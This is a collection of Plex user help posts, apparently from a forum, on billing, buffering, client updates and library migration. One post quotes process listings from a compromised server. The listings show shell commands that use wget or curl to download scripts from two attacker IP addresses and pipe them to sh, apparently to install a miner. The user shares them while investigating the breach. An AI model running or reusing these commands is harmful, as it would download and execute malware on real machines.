I logged into Plex today and saw that I could purchase the Plex Pass; I thought it was a mistake, and there was also an update. But after the update, the message was still there. According to my billing history, I paid €169 for the Lifetime Pass on August 31, 2020, and have been using it continuously ever since. Now, though, it seems to be gone, since my billing history also says “Ended Oct. 20.”
What happend, what can i do?

Was running on windows, a version before the recent fixes. I had neglected updating for some time because I'm a relatively new user and did not see the updates come in or the auto-update function. Everything has since been updated. My question is whether I have been affected, or if I even can be affected? My server is only available locally, I do not pay for remote access and the settings for that have always been turned off. It is only on my local network. If I could be affected, how would I check on windows?
Apologies for the inexperienced questions.

I updated the app on my nvidia shield last week and it looks really nice and all, but the photos aren’t there. The old app could view the photos folders that I have set up. The server still shows them, but not on the TV app. Can I get them back?

I have friends and family that add movies to their playlist and are downloaded through radarr. They don't tell me to remove them when they're done watching them or finds out the movie sucks and should be removed.
Like playlists for downloads, is there a tool to monitor a playlist and automatically delete movies listed in them from the server?
Edit...just wanted to add the users have the technical know how of 15 year old dog. That means I'll be the only one doing the maintenance. If I accidentally marked a movie for deletion and it gets deleted before they have a chance to watch it, they'll just add it to their playlist again, which is fine with me. I have some classic movies that have not been watched in a while but is good to have around, so I don't want an automated rule to delete them. I'm ok with me manually marking them for deletion as I see them while I browse through the library. Preferably done via the Plex app from either my Android TV or phone.
Has anyone else experienced more buffering and payback issues on remote streaming? Before the update, streaming a 20Mbps encode was fine. After, not so much. Both connections are strong and it's through tailscale, restarted both sides equipment.

So I followed along with AI's instructions and I think it led me down a wrong or incomplete path.
I recently updated today from DSM 6 to 7. Backed up my Plex library to a USB drive, uninstalled Plex, ran this manually: PlexMediaServer-1.43.5.11029-6bf8af3f0-x86_64_DSM7
Everything looks fine, but I don't have access to my old library of movies/TV shows. I now have a "PlexMediaServer" folder which is new. Regardless, the library is still available in the old Plex folder.
So what should I do next to get my old library back without having to scrape metadata all over again.

I need to pay my ISP in Australia to have a static IP and I think I read on the Plex site that friends can stream higher quality bitrate if I portforward my router but I still have a dynamic IP, does opening the port do anything on a dynamic IP?
Help. I’m 1500 miles from my server. I can stream my iOS PlexAmp no problem.
Thankfully I can at least access my music.
But when I try streaming movies from the iOS Plex app, I’m showing that my server is currently unavailable.
I’ve tried accessing it through WiFi and through cellular networks.
My server is running on a Win11 machine. Plex server is running the latest version. Prior to leaving for this trip I triple checked
that my server was accessible remotely. Ports are configured per Plex instructions.
I know I’m sol till I get back home. Any advice is welcome, comments on switching to Linux, though well intentioned is a no go.
Thanks in advance.
It looks like it happened overnight for me - watched a movie yesterday.
Today the same movie goes into endless buffering.
AppleTV 3rd gen.
tvOS 27.0
Client version 2026.20.0(2099)
Plex Server v1.43.4.10903
I have apps auto-update on in my AppleTV.
The server is running the latest version and I haven't touched it for a while
Is this caused by AppleTV Plex app update - can't find when my Plex app was updated exactly but it looks line a new version was release 6 days ago.
Any fix advice?
Thanks.

Hi there,
I use Plex heavily for streaming music but struggle with identifying uncompressed files. Often times I’ll have the .mp3 and an uncompressed .wav copy (for DJing). Many of these are promotional content (radio) so I’ll receive them in both formats - artist_name/album_name/mp3/filename.mp3 and wav/filename.wav.
I understand that .wav doesn’t contain metadata, but the file names are identical, and located in the same artist/album subdirectory as the .mp3 files.
Yet, the .wav files are all identified as random various artist tracks.
Curious if anyone has any tips for how to better manage these music files.

What do I need to do to improve my playback stream? With the local file I don't encounter this problem but when streaming I do.
Tell me what setting I need to stop this from happening

Relevant info:
Plex Pass
PMS 1.43.5.11029
FireTV version 2026.20.0 (971050504)
I have plenty of bandwidth in both directions (I can currently watch a 90Mbit/sec DirectPlay in FL from my server in TX, for example)
QNAP TS-451D2, QNAP says Intel® HD Graphics 600, which has QSV, Plex Dashboard says "(hw)" transcodes.
Whenever (and this has been going on for a while) I watch a transcoded video it always pauses to buffer. I have "Nerd Stats" turned on in my Fire Stick player, and when I pause it for a few seconds then let it play the "Engine" Box will show "Buffer: X seconds ahead" but it never starts to refill the buffer, and will eventually go to 0, at which point it pauses again (and usually for good until I manually pause it to give the buffer time to fill up again). Doesn't matter if it's audio or video for the Transcode reason.
Any ideas on why it's not refilling the transcode buffer until it's paused? This is making transcoded videos unwatchable!

As someone who only really uses Plex in the most basic of ways - having it open on my laptop so I can watch downloaded stuff on my PS5 on my local network - I'm not in any danger, right? The issue has to do with actual plex servers and whatnot?
I just want to be clear since everyone is talking about servers and all that.

I don't need help with fixing the issue, I'm trying to figure out how they embedded it and how it triggers. So far I've figured out that they must have configured the media scanner to start their process. See the below snippet, you can see the media scanner PID is 24194 which is spawned from the default plex application from the systemd service configuration. Then all the sh commands come from that. So, my main question is, where can I find how the media scanner is configured? Something in it's configuration is creating these shell commands to try and pull down their miner.
plex 2248 1 0 08:36 ? 00:01:42 /usr/lib/plexmediaserver/Plex Media Server
plex 24194 2248 0 11:37 ? 00:00:00 /usr/lib/plexmediaserver/Plex Media Scanner --match --type 8 --log-file-suffix Matcher --files @/tmp/4073-be72-5139-d6fd.txt --match-tag-mode=all
plex 24197 24194 0 11:37 ? 00:00:00 /bin/sh -c wget http://217.60.194.116/plex -O-|sh
plex 24198 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://217.60.194.116/plex -O- || curl http://217.60.194.116/plex -o-)|sh
plex 24199 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://217.60.194.116/x -O- || curl http://217.60.194.116/x -o-)|sh
plex 24200 24194 0 11:37 ? 00:00:00 /bin/sh -c (wget http://77.90.185.205/m/sh -O- || curl http://77.90.185.205/m/sh -o-)|sh
I have already blocked outbound network traffic to those 2 IP, and one of them is a known bot farm according to some quick searching.

I hate the new client. Since the update, all DTS 5.1 video have no audio.
AAC , DTS 7.1, AC3, EAC5.1, HD-DTS, all work fine.
Only DTS 5.1 have no audio.
Only way is I force to transcode, which is stupid.
Even if I disable Audio Passthough, still no audio.
Also, why the Audio passthough can only set what codec to passthough if I select Optical?
When I select HDMI, I can't do any selection.
Plex need to do less "New Feature" like Live TV, PVR, free movie, etc. Focus on get a soild/stable app.

Anyone know how to check this? Is it just a matter of SSHing into the device and following the instructions from this comment?

Scenario: I'm watching live TV (from HDHomerun tuner) and things are great until it later starts stutter/buffering after about an hour of having watched live TV. For example, I sit down to watch a TV show that is airing live -- sporting events a big example -- from local broadcasters, using a good over-the-air antenna that delivers a very strong signal. It show nicely, looks great and sounds great until right around an hour later. At that point the circle of death starts, buffering and stuttering. It tries to pick up but lasts only about 5 - 10 seconds before it repeats over and over again.
Back out of the app entirely, restart the app and go back to live TV again and it shows great again.
Plex is current, running from Unraid docker.
Note that I can use Jellyfin to watch and don't have the issue at all. Watching recorded content or content from my library of content doesn't have any issue. It's just live TV coming from the HDHomerun tuner(s)
